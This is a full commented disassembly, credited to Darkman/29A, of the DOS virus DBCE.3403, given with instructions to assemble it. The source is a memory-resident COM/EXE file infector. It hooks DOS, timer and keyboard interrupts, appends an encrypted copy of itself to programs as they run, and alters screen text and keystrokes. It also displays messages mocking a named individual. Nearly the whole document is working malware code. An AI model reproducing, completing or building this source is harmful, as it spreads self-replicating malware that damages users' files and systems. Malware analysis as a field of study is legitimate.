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SLAM4.032: DBCE.3403 disassembled by Darkman/29a
DBCE.3403 Disassembly by Darkman/29A
DBCE.3403 is a 3403 bytes parasitic resident COM/EXE virus. Infects files at load and execute program, except COMMAND.COM, by appending the virus to the infected COM/EXE file. DBCE.3403 has an error handler and 8-bit exclusive OR (XOR) encryption in file.
To compile DBCE.3403 with Turbo Assembler v 4.0 type:
.model tiny
mov ax,cs ; AX = code segment
virus_seg equ word ptr $+01h ; Segment of virus in paragraphs
add ax,10h ; Add segment of virus in paragrap...
push ax ; Save AX at stack
lea_ax_imm16 equ word ptr $+01h ; Offset of the immediate of LE...
lea ax,first_gen ; AX = offset of first_gen
push ax ; Save AX at stack
retf ; Return far!
lea si,infect_mark ; SI = offset of infect_mark
dec si ; Decrease index register
add byte ptr cs:[si],07h
jmp_imm8 equ word ptr $ ; Offset of JMP imm8
jmp decrypt_loop
mov ah,0feh ; DBCE.3403 function
int 21h
push es ; Save ES at stack
cmp ah,69h ; Already resident?
je virus_exit ; Equal? Jump to virus_exit
mov ah,2ah ; Get system date
int 21h
cmp cx,7C9h ; 1993?
je allocate_mem ; Equal? Jump to allocate_mem
cmp cx,7Cah ; 1994?
ja virus_exit ; Above? Jump to virus_exit
cmp dh,07h ; July?
jb allocate_mem ; Below? Jump to allocate_mem
ja virus_exit ; Above? Jump to virus_exit
cmp dl,09h ; 9th July?
jbe allocate_mem ; Below or equal? Jump to allocate...
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
pop es ; Load ES from stack
cmp word ptr [file_header],'ZM'
je vir_exe_exit ; Equal? Jump to vir_exe_exit
lea si,file_header ; SI = offset of file_header
mov di,100h ; DI = offset of beginning of code
mov cx,03h ; Move three bytes
rep movsb ; Move the original code to beginning
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
push es ; Save ES at stack
mov ax,100h ; AX = offset of beginning of code
push ax ; Save AX at stack
jmp zero_regs
mov bx,es ; BX = segment of PSP for current ...
add bx,10h ; BX = segment of beginning of EXE...
mov ax,[initial_ss] ; AX = initial SS relative to star...
add ax,bx ; Add segment of beginning of EXE ...
mov ss,ax ; SS = initial SS relative to star...
mov ax,[initial_sp] ; AX = initial SP
mov sp,ax ; SP = " "
mov ax,[initial_cs] ; AX = initial CS relative to star...
add ax,bx ; Add segment of beginning of EXE ...
push ax ; Save AX at stack
mov ax,[initial_ip] ; AX = initial IP
push ax ; Save AX at stack
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
xor ax,ax ; Zero AX
xor bx,bx ; " BX
xor cx,cx ; " CX
xor dx,dx ; " DX
xor si,si ; " SI
xor di,di ; " DI
retf ; Return far!
mov ah,49h ; Free memory
int 21h
mov ah,48h ; Allocate memory
mov bx,0ffffh ; BX = number of paragraphs to all...
int 21h
mov ah,4ah ; Resize memory block
sub bx,((data_end_-code_begin)-(random_end-random_begin)+0fh)/10h-01h
int 21h
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ah,4ah ; Resize memory block
mov cx,es ; CX = segment of PSP for current ...
stc ; Set carry flag
adc cx,bx ; Add maximum available for specif...
mov bx,((data_end_-code_begin)-(random_end-random_begin)+0fh)/10h-02h
stc ; Set carry flag
sbb es:[02h],bx ; Subtract size of the virus in pa...
mov es,cx ; ES = segment of block to resize
int 21h
dec ax ; AX = segment of virus Memory Con...
mov ds,ax ; DS = " " " " "
mov word ptr ds:[01h],08h
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
cld ; Clear direction flag
xor si,si ; Zero SI
xor di,di ; Zero DI
mov cx,(data_end-code_begin)
rep movsb ; Move virus to top of memory
push es ; Save ES at stack
lea ax,get_set_int ; AX = offset of get_set_int
push ax ; Save AX at stack
retf ; Return far!
mov bx,(21h*04h) ; Get and set interrupt vector 21h
lea dx,int21_virus ; DX = offet of int21_virus
lea bp,int21_addr ; BP = offset of int21_addr
call get_set_int_
mov bx,(08h*04h) ; Get and set interrupt vector 08h
lea dx,int08_virus ; DX = offet of int08_virus
lea bp,int08_addr ; BP = offset of int08_addr
call get_set_int_
mov bx,(09h*04h) ; Get and set interrupt vector 09h
lea dx,int09_virus ; DX = offet of int09_virus
lea bp,int09_addr ; BP = offset of int09_addr
call get_set_int_
xor ax,ax ; Zero AX
mov cx,(random_end-random_begin)/02h
lea di,random_off ; DI = offset of random_off
rep stosw ; Store zero
mov ah,0fh ; Get current video mode
int 10h
cmp al,07h ; Monochrome?
je monochrome ; Equal? Jump to monochrome
mov cs:[video_addr],0b800h
jmp init_random
mov cs:[video_addr],0b000h
call init_random_
jmp virus_exit
get_set_int_ proc near ; Get and set interrupt vector
push ds ; Save DS at stack
xor ax,ax ; Zero AX
mov ds,ax ; DS = segment of interrupt table
mov ax,[bx] ; AX = offset of interrupt
mov cs:[bp],ax ; Store offset of interrupt
mov ax,[bx+02h] ; AX = segment of interupt
mov cs:[bp+02h],ax ; Store segment of interrupt
cli ; Clear interrupt-enable flag
mov [bx],dx ; Store offset of interrupt
mov [bx+02h],cs ; Store segment of interrupt
sti ; Set interrupt-enable flag
pop ds ; Save DS at stack
ret ; Return!
int24_virus proc near ; Interrupt 24h of DBCE.3403
xor al,al ; Ignore error and continue proces...
iret ; Interrupt return!
int21_virus proc near ; Interrupt 21h of DBCE.3403
pushf ; Save flags at stack
cmp ah,0feh ; DBCE.3403 function?
jne test_functio ; Not equal? Jump to test_functio
mov ah,69h ; Already resident
popf ; Load flags from stack
iret ; Interrupt return!
cmp ax,4b00h ; Load and execute program?
je load_and_exe ; Equal? Jump to load_and_exe
popf ; Load flags from stack
jmp cs:[int21_addr]
mov cs:[data_segment],ds
push bx cx si di ds es dx
pushf ; Save flags at stack
call cs:[int21_addr]
call calc_video
mov cx,190h ; Clear the first four-hundred cha...
xor di,di ; Zero DI
mov byte ptr es:[di],00h
inc di ; Increase index register
inc di ; " " "
loop video_loop
mov ah,0fh ; Get current video mode
int 10h
push bx ; Save BX at stack
mov ah,02h ; Set cursor position
xor dx,dx ; Zero DX
int 10h
mov bx,0ah ; Random number within ten
call rnd_in_range
mov si,ax ; SI = random number within ten
shl si,01h ; Multiply random number within te...
mov word ptr ds:[exam_offset],320h
mov ah,09h ; Write string to standard output
or si,si ; Offset of you_have_the?
jz write_str ; Zero? Jump to write_str
lea dx,amidst_dale_ ; DX = offset of amidst_dale_
int 21h
mov bx,03h ; Random number within three
call rnd_in_range
shl ax,01h ; Multiply random number within th...
mov di,ax ; DI = random number within three ...
mov ah,09h ; Write string to standard output
mov dx,[di+random_msg] ; DX = offset within random_msg
int 21h
lea dx,__the_follow ; DX = offset of __the_follow
int 21h
mov dx,[si+random_msg_] ; DX = offset within random_msg_
int 21h
mov cx,190h ; Set the color for three hundred ...
xor di,di ; Zero DI
mov byte ptr es:[di+01h],40h
inc di ; Increase index register
inc di ; " " "
loop video_loop_
pop bx ; Load BX from stack
mov ah,02h ; Set cursor position
mov dx,500h ; DX = row and column
int 10h
pop dx es ds di si cx bx
push bx cx si di ds es dx
push ds ; Save DS at stack
pop es ; Load ES from stack (DS)
cld ; Clear direction flag
xor al,al ; Zero AL
mov cx,41h ; Search through sixty-five bytes
mov di,dx ; DI = offset of filename
repne scasb ; Find end of filename
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
push di ; Save DI at stack
pop si ; Load SI from stack (DI)
sub si,0ch ; Subtract twelve from offset of f...
lea di,command_com ; DI = offset of command_com
mov cx,0bh ; Compare eleven bytes
rep cmpsb ; Compare filename
jne load_info ; Not equal? Jump to load_info
jmp infect_exit
mov ax,4300h ; Get file attributes
pop dx ; Load DX from stack
push dx ; Save DX at stack
int 21h
jc infect_exit_ ; Error? Jump to infect_exit_
mov cs:[file_attr],cx ; Store file attributes
mov bx,(24h*04h) ; Set interrupt vector 24h
lea dx,int24_virus ; DX = offset of int24_virus
lea bp,int24_addr ; BP = offset of int24_addr
call get_set_int_
call calc_integri
mov ax,4301h ; Set file attributes
xor cx,cx ; CX = new file attributes
pop dx ; Load DX from stack
push dx ; Save DX at stack
int 21h
jc infect_exit_ ; Error? Jump to infect_exit_
mov ax,3d02h ; Open file (read/write)
int 21h
jc find_f_error ; Error? Jump to find_f_error
mov cs:[file_handle],ax ; Store file handle
mov ah,4eh ; Find first matching file
int 21h
jc set_cu_error ; Error? Jump to set_cu_error
mov ax,4202h ; Set current file position (EOF)
mov bx,cs:[file_handle] ; BX = file handle
mov cx,-01h ; CX:DX = offset from origin of ne...
mov dx,-06h ; " " " " " " "
int 21h
jc read_error ; Error? Jump to read_error
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
mov ah,3fh ; Read from file
mov cx,06h ; Read six bytes
lea dx,infect_mark_ ; DX = offset of infect_mark_
int 21h
jc carry_error ; Error? Jump to carry_error
lea si,infect_mark ; SI = offset of infect_mark
mov di,dx ; DI = offset of infect_mark_
rep cmpsb ; Compare infection mark
jne get_dta_addr ; Not previously infected? Jump to...
jmp close_file
mov ah,2fh ; Get disk transfer area address
int 21h
mov cx,es:[bx+16h] ; CX = file time
mov dx,es:[bx+18h] ; DX = file date
mov [file_time],cx ; Store file time
mov [file_date],dx ; Store file date
mov ax,es:[bx+1ah] ; AX = low-order word of filesize
mov cx,es:[bx+1ch] ; CX = high-order word of filesize
or cx,cx ; Too small in filesize?
jnz calc_paragra ; Not zero? Jump to calc_paragra
cmp ax,100h ; Too small in filesize?
jae calc_paragra ; Above or equal? Jump to calc_par...
stc ; Set carry flag
jmp carry_error
push ax ; Save AX at stack
mov dx,cx ; DX = high-order word of filesize
mov bx,10h ; Divide by paragraphs
div bx ; DX:AX = filesize in paragraphs
add ax,10h ; Add size of Program Segment Pref...
mov [virus_seg],ax ; Store segment of virus in paragr...
or dx,dx ; Zero remainder?
pop ax ; Load AX from stack
jz store_size ; Zero? Jump to store_size
inc [virus_seg] ; Increase segment of virus in par...
add ax,10h ; Add size of Program Segment Pref...
sub ax,dx ; Subtract remainder from filesize...
mov word ptr [filesize],cx
mov word ptr [filesize+02h],ax
mov [virus_offset],ax ; Store offset of virus within inf...
sub [virus_offset],03h ; Subtract size of JMP imm16 opcod...
jc set_c_error ; Error? Jump to set_c_error
mov ax,4200h ; Set current file position (SOF)
mov bx,[file_handle] ; BX = file handle
xor cx,cx ; Zero CX
xor dx,dx ; " DX
int 21h
jc read_error_ ; Error? Jump to read_error_
mov ah,3fh ; Read from file
mov cx,18h ; Read twenty-four bytes
lea dx,file_header ; DX = offset of file_header
int 21h
jc set_c_error_ ; Error? Jump to set_c_error_
cmp word ptr [file_header],'ZM'
je move_header ; Found EXE signature? Jump to mov...
mov ax,4200h ; Set current file position (SOF)
xor cx,cx ; Zero CX
xor dx,dx ; Zero DX
int 21h
jc move_header ; Error? Jump to move_header
mov ah,40h ; Write to file
mov cx,03h ; Write three bytes
lea dx,infect_code ; DX = offset of infect_code
int 21h
jmp write_error
mov ax,word ptr [file_header+0eh]
mov [initial_ss],ax ; Store initial SS relative to sta...
mov ax,word ptr [file_header+10h]
mov [initial_sp],ax ; Store initial SP
mov ax,word ptr [file_header+14h]
mov [initial_ip],ax ; Store initial IP
mov ax,word ptr [file_header+16h]
mov [initial_cs],ax ; Store initial CS relative to sta...
mov ax,word ptr [filesize+02h]
mov dx,word ptr [filesize]
add ax,(code_end-code_begin)
adc dx,00h ; Convert to 32-bit
jc set__error ; Error? Jump to set__error
div [divide_pages] ; DX:AX = filesize in pages
or dx,dx ; No bytes in last 512-bytes page ...
je dont_inc_pag ; Equal? Jump to dont_inc_pag
inc ax ; Increase total number of 512-byt...
mov word ptr [file_header+04h],ax
mov word ptr [file_header+02h],dx
mov ax,word ptr [filesize+02h]
mov dx,word ptr [filesize]
div [divide_parag] ; DX:AX = filesize in paragraphs
sub ax,word ptr [file_header+08h]
mov word ptr [file_header+16h],ax
mov word ptr [file_header+14h],00h
add ax,(code_end-code_begin)/10h
mov word ptr [file_header+0eh],ax
mov word ptr [file_header+10h],100h
mov [virus_seg],00h ; Store segment of virus in paragr...
mov ax,4200h ; Set current file position (SOF)
xor cx,cx ; Zero CX
xor dx,dx ; Zero DX
int 21h
jc write_error ; Error? Jump to write_error
mov ah,40h ; Write to file
mov cx,18h ; Write twenty-four bytes
lea dx,file_header ; DX = offset of file_header
int 21h
jc set__error_ ; Error? Jump to set__error_
mov ax,4200h ; Set current file position (SOF)
mov cx,word ptr [filesize]
mov dx,word ptr [filesize+02h]
int 21h
jc save_info ; Error? Jump to save_info
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
mov [jmp_imm8],1111100111101011b
xor si,si ; Zero SI
lea di,data_end ; DI = offset of data_end
mov cx,(code_end-code_begin)
rep movsb ; Create a copy of the virus
lea si,data_end+15h ; SI = offset of data_end + 15h
mov cx,(crypt_end-crypt_begin)
sub byte ptr [si],07h ; Encrypt byte
inc si ; Increase index register
loop encrypt_loop
mov ah,40h ; Write to file
mov cx,(code_end-code_begin)
lea dx,data_end ; DX = offset of data_end
int 21h
mov ax,5701h ; Set file's date and time
mov cx,[file_time] ; CX = new time
mov dx,[file_date] ; DX = new date
int 21h
mov ah,3eh ; Close file
int 21h
mov ax,[data_segment] ; AX = data segment
mov ds,ax ; DS = " "
mov ax,4301h ; Set file attributes
mov cx,cs:[file_attr] ; CX = new file attributes
pop dx ; Load DX from stack
push dx ; Save DX at stack
int 21h
les dx,[int24_addr] ; ES:DX = pointer to interrupt 24h
xor ax,ax ; Zero AX
mov ds,ax ; DS = segment of interrupt table
mov ds:[24h*04h],dx ; Store offset of interrupt 24h
mov ds:[24h*04h+02h],es ; Store segment of interrupt 24h
pop dx es ds di si cx bx
popf ; Load flags from stack
iret ; Interrupt return!
int08_virus proc near ; Interrupt 08h of DBCE.3403
pushf ; Save flags at stack
pushf ; Save flags at stack
call cs:[int08_addr]
cmp cs:[examining],01h ; Already examining the video pag...?
jne exam_video ; Not equal? Jump to exam_video
popf ; Load flags from stack
iret ; Interrupt return!
mov cs:[examining],01h ; Examining the video page (regen ...
sti ; Set interrupt-enable flag
push ax bx cx dx si di bp ds es
call calc_video
mov ax,40h ; AX = segment of BIOS data segment
mov ds,ax ; DS = " " " " "
mov bp,ds:[4ch] ; BP = video page (regen buffer) s...
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov di,[exam_offset] ; DI = current offset under examin...
mov cx,50h ; Search through eighty bytes
cld ; Clear direction flag
lea si,computer_vir+0ah ; SI = offset of computer_vir + 0ah
lodsb ; AL = byte of computer_vir
inc di ; Increase index register
inc di ; " " "
mov ah,es:[di] ; AH = byte of segment within vide...
mov dl,00h ; Upcase character
cmp ah,'A' ; Text?
jb examine_text ; Below? Jump to examine_text
cmp ah,'Z' ; Text?
ja examine_text ; Above? Jump to examine_text
add ah,20h ; Lowcase character
mov dl,01h ; Lowcase character
cmp ah,al ; Found character?
jne not_found ; Not equal? Jump to not_found
cmp si,offset computer_vir+0fh
je store_clank ; Equal? Jump to store_clank
jmp find_virus_
jcxz test_offset ; Zero CX? Jump to test_offset
dec cx ; Decrease CX
cmp si,offset computer_vir+0bh
jbe find_virus ; Below or equal? Jump to find_virus
dec di ; Decrease index register
dec di ; " " "
jmp find_virus
cmp di,bp ; End of video page (regen buffer)...
jb add_to_off ; Below? Jump to add_to_off
mov [exam_offset],00h ; Set current offset under examina...
mov di,51h ; DI = current offset under examin...
cmp byte ptr es:[di],40h
jne int08_exit ; Not equal? Jump to int08_exit
mov [exam_offset],320h ; Set current offset under examina...
jmp int08_exit
add [exam_offset],0a0h ; Add hundred and sixty to current...
jmp int08_exit
mov cx,05h ; Store five bytes
lea si,computer_vir+12h ; SI = offset of computer_vir + 12h
sub di,08h ; Subtract eight from current offs...
lodsb ; AL = byte of computer_vir
cmp dl,01h ; Upcase character?
jne lowcase_char ; Not equal? Jump to lowcase_char
sub al,20h ; Upcase character
stosb ; Store byte of computer_vir
inc di ; Increase index register
loop store_loop
mov al,es:[di] ; AL = byte of segment within vide...
cmp al,'E' ; Found a 'E' in the video page (r...
je store_an_i ; Equal? Jump to store_an_i
cmp al,'e' ; Found a 'e' in the video page (r...
jne int08_exit ; Not equal? Jump to int08_exit
mov al,'i' ; Convert the found 'e' to an 'i'
cmp dl,01h ; Upcase character?
jne lowcase_ch__ ; Not equal? Jump to lowcase_ch__
mov al,'I' ; Convert the found 'E' to an 'I'
stosb ; Store a 'i' or a 'I' in the vide...
inc di ; Increase index register
stosb ; Store a 'i' or a 'I' in the vide...
pop es ds bp di si dx cx bx ax
popf ; Load flags from stack
mov cs:[examining],00h ; Ain't examining the video page (...
iret ; Interrupt return!
calc_video proc near ; Calculate segment within video m...
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov cx,[video_addr] ; CX = video mode address
mov ah,0fh ; Get current video mode
xor bh,bh ; Zero BH
int 10h
mov ax,100h ; Multiply by two hundred and fixt...
xchg bh,bl ; BL = active page
mul bx ; DX:AX = pages multiplied by two ...
add cx,ax ; Add pages multiplied by two hund...
mov es,cx ; ES = segment within video mode a...
ret ; Return!
int09_virus proc near ; Interrupt 09h of DBCE.3403
pushf ; Save flags at stack
pushf ; Save flags at stack
call cs:[int09_addr]
cli ; Clear interrupt-enable flag
push bx cx dx si di ds es
mov bx,40h ; BX = segment of BIOS data segment
mov ds,bx ; DS = " " " " "
mov bx,ds:[1ch] ; BX = pointer to first free slot ...
cmp bx,ds:[1ah] ; Pointer to first free slot in ke...
je int09_exit ; Equal? Jump to int09_exit
sub bx,02h ; Subtract two from pointer to fir...
cmp bx,1eh ; Beginning of keyboard circular b...
jnb reset_offset ; Not below? Jump to reset_offset
mov bx,3ch ; BX = End of keyboard circular bu...
mov dx,[bx] ; DX = word of keyboard circular b...
mov dh,00h ; Upcase character
cmp dl,'A' ; Text?
jb examine_tex_ ; Below? Jump to examine_tex_
cmp dl,'Z' ; Text?
ja examine_tex_ ; Above? Jump to examine_tex_
add dl,20h ; Lowcase character
inc dh ; Lowcase character
mov si,cs:[exam_offset_]
cmp dl,cs:[si] ; Equal to the byte from the keybo...
jne reset_offse_ ; Not equal? jump to reset_offse_
inc cs:[exam_offset_] ; Increase Current offset under ex...
cmp si,offset computer_vir+0eh
jb int09_exit ; Below? Jump to int09_exit
mov byte ptr ds:[1ah],1eh
mov byte ptr ds:[1ch],3ah
mov byte ptr ds:[1eh],08h
mov byte ptr ds:[20h],08h
mov byte ptr ds:[22h],08h
mov byte ptr ds:[24h],08h
push ds ; Save DS at stack
pop es ; Load ES from stack (DS)
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov cx,0ah ; Compare ten bytes
lea si,computer_vir+12h ; SI = offset of computer + 12h
mov di,26h ; DI = offset within keyboard circ...
lodsb ; AL = byte of computer_vir
cmp dh,01h ; Upcase character?
jne lowcase_cha_ ; Not equal? Jump to lowcase_cha_
sub al,20h ; Upcase character
stosb ; Store byte of computer_vir
inc di ; Increase index register
loop store_loop_
jmp int09_exit
mov cs:[exam_offset_],offset computer_vir+0ah
sti ; Set interrupt-enable flag
pop es ds di si dx cx bx
popf ; Load flags from stack
iret ; Interrupt return!
init_random_ proc near ; Initialize random number
push ds si dx cx bx ; Save registers at stack
xor ah,ah ; Get system time
int 1ah
in al,40h ; AL = 8-bit random number
mov ah,al ; AH = " " "
in al,40h ; AX = 16-bit random number
xor ax,cx ; AX = low-order word of random nu...
xor dx,ax ; DX = high-order word of random n...
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
lea si,random_off ; SI = offset of random_off
xor bh,bh ; Zero BH
jmp store_random
rnd_in_range proc near ; Random number within range
push ds si dx cx bx ; Save registers at stack
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
lea si,random_off ; SI = offset of random_table
mov bl,[si] ; BL = offset within the table of ...
xor bh,bh ; Zero BH
mov ax,[bx+si+02h] ; AX = low-order word of random nu...
mov dx,[bx+si+04h] ; DX = high-order word of random n...
add byte ptr [si],04h ; Add four to the offset within th...
mov cx,07h ; Modify the random number seven t...
shl ax,01h ; Multiply low-order word of rando...
rcl dx,01h ; Rorate high-order word of random...
mov bl,al ; BL = low-order byte of low-order...
xor bl,dh ; Exclusive OR high-order byte of ...
jns dont_inc_rnd ; No sign? Jump to dont_inc_rnd
inc al ; Increase low-order byte of low-o...
loop random_loop
mov bl,[si+01h] ; BL = offset within the table of ...
mov [bx+si+02h],ax ; Store the low-order word of the ...
mov [bx+si+04h],dx ; Store the high-order word of the...
add bl,04h ; Add four to the offset within ta...
mov [si+01h],bl ; Store offset within the table of...
mov al,dl ; AL = low-order byte of high-orde...
cmp bl,[si] ; Next offset within the table of...?
jne dont_add_off ; not equal? Jump to dont_add_off
add byte ptr [si],04h ; Add four to the offset within th...
pop bx ; Load BX from stack
push bx ; Save BX at stack
xor dx,dx ; Zero DX
mul bx ; DX:AX = random number mutiplied ...
mov bx,0ffffh ; Divide by sixty-five thousand an...
div bx ; AX = random number within range
pop bx cx dx si ds ; Load registers from stack
ret ; Return!
command_com db 'COMMAND.COM' ; COMMAND.COM
divide_pages dw 200h ; Divide by pages
divide_parag dw 10h ; Divide by paragraphs
random_msg dw driveling ; Offset of driveling
dw clank_clunki ; Offset of clank_clunki
dw rubishy_rubi ; Offset of rubishy_rubi
random_msg_ dw you_have_the ; Offset of you_have_the
dw in_my_assesm ; Offset of in_my_assesm
dw a__virus__or ; Offset of a__virus__or
dw the_clankswe ; Offset of the_clankswe
dw pseudoviruse ; Offset of pseudoviruse
dw computer_vir ; Offset of computer_vir
dw rpm_is_not_s ; Offset of rpm_is_not_s
dw the_purity_o ; Offset of the_purity_o
dw any_so_calle ; Offset of any_so_calle
dw if_a_pseudov ; Offset of if_a_pseudov
amidst_dale_ db 'Amidst Dale Beaudoin''s $'
driveling db 'driveling$'
clank_clunki db 'clank clunking crap$'
rubishy_rubi db 'rubishy rubish$'
__the_follow db ', the following wisdom spews forth:',0ah,0dh,'$'
you_have_the db 'You have the Dale Beaudoin Clankswerks Engine by pseudoVirus writer Virotech!',0ah,0dh
db 'This crude clankswerks was quickly and sloppily put together just like',0ah,0dh
db 'Dale''s Fido messages.$'
in_my_assesm db 'In my assesment there is ways and means to break new ground in the',0ah,0dh
db 'computer sciences. virus not= virus. virus = clankswerks engine!$'
a__virus__or db 'A "virus" or "trojan" that attempts to do a DIRECT WRITE bypassing the',0ah,0dh
db 'operating system is not a virus. It is a mathclanking engine.$'
the_clankswe db 'The clankswerks "appears" to have a measure of stealth by passing DOS but',0ah,0dh
db 'the intent is more deliberate than stealthy. The "formula" or "equation"',0ah,0dh
db 'is designed with a directive.$'
pseudoviruse db 'PseudoViruses deliberately mathclank other software programs. They are',0ah,0dh
db 'not true viruses.$'
computer_vir db 'Computer "virus" (clankswerks) do not replicate, they iterate,',0ah,0dh
db 'decrementally and incrementally through a math engine dependent on a',0ah,0dh
db 'specific order of operations.$'
rpm_is_not_s db 'RPM is not software intergrated. IDE drives I have worked with often',0ah,0dh
db 'have the platter scored after subject to a clankswerks. If the controller',0ah,0dh
db 'would to do a seek in a tight loop the harmonics would be enough to allow',0ah,0dh
db 'the heads to crash through the air-bearing.$'
the_purity_o db 'The purity of the overall engine is mathclanked by the deliberate',0ah,0dh
db 'alteration of one of the subsets. That alteration is dependent on the',0ah,0dh
db 'works of an human idiot math-clanker. It is illegal and not natural.$'
any_so_calle db 'Any so called virus that can take instrucution to lift attributes has to',0ah,0dh
db 'be artificially intelligent.$'
if_a_pseudov db 'If a pseudoVirus consults the COMSPEC to find the original copy of',0ah,0dh
db 'COMMAND.COM, all you have to do is use debug and rename COMSPEC and',0ah,0dh
db 'COMMAND.COM. Change the varialbe and tell your virus to decipher it! If',0ah,0dh
db 'it does consult or decipher then it''s AI, not virus.$'
calc_integri proc near ; Calculate integrity of DBCE.3403
lea si,integr_begin ; SI = offset of integr_begin
mov cx,(integr_end-integr_begin)
xor ax,ax ; Zero AX
add al,cs:[si] ; AL = integrity of DBCE.3403
inc si ; Increase index register
loop integri_loop
cmp al,6eh ; Correct integrity
je integri_exit ; Equal? Jump to integri_exit
mov bx,0ffffh ; Random number within sixty-five ...
call rnd_in_range
jmp ax
ret ; Return!
virus_offset equ word ptr $+01h ; Offset of virus within infected ...
infect_code db 0e9h,?,? ; JMP imm16 (opcode 0e9h)
initial_cs dw ? ; Initial CS relative to start of ...
initial_ip dw ? ; Initial IP
initial_ss dw ? ; Initial SS relative to start of ...
initial_sp dw ? ; Initial SP
file_header db 0cdh,20h,16h dup(?) ; File header
infect_mark db '[DBCE]' ; Infection mark
int08_addr dd ? ; Address of interrupt 08h
int09_addr dd ? ; Address of interrupt 09h
int21_addr dd ? ; Address of interrupt 21h
int24_addr dd ? ; Address of interrupt 24h
file_handle dw ? ; File handle
file_attr dw ? ; File attributes
file_date dw ? ; File date
file_time dw ? ; File time
filesize dd ? ; Filesize
data_segment dw ? ; Data segment
infect_mark_ db 06h dup(?) ; Infection mark
video_addr dw ? ; Video mode address
exam_offset dw ? ; Current offset under examination
exam_offset_ dw ? ; " " " "
examining db ? ; Examining the video page (regen ...
random_off dw ? ; Offset within the table of rando...
random_table dw 80h dup(?) ; Table of random numbers
db (data_end-code_begin) dup(?)
mov [lea_ax_imm16+100h],offset decryptor
jmp crypt_begin
end code_begin